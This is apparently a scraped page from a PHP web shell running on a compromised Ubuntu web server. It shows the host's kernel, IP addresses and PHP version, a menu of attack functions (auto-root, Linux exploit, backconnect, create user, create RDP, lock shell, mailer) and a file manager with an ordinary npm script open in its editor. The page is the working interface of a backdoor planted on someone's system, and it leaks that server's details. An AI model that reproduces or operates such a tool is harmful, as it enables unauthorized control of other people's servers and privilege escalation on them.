Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.21.105.46
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
npm-cli.js
1.95
KB
-rwxr-xr-x
read-package-json.js
513
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : read-package-json.js
var argv = process.argv if (argv.length < 3) { console.error('Usage: read-package.json <file> [<fields> ...]') process.exit(1) } var file = argv[2] var readJson = require('read-package-json') readJson(file, function (er, data) { if (er) throw er if (argv.length === 3) { console.log(data) } else { argv.slice(3).forEach(function (field) { field = field.split('.') var val = data field.forEach(function (f) { val = val[f] }) console.log(val) }) } })
Close